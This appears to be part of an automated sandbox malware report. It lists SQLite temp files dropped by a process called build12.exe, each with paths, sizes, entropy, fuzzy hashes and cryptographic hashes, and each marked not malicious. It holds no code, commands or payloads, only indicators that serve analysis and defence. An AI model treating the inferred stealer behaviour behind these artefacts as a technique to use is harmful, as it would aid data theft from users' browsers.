                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp41C.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp43C.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp43D.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp45C.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp687C.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp689C.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp68AD.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp68CD.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp6BC3.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp6BE4.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp6C04.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp6C24.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp6F05.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp6F06.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp6F25.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp6F26.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp6F46.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp6F55.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp71CA.tmp

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):51200
                                                                                                                                                                                                                                      Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
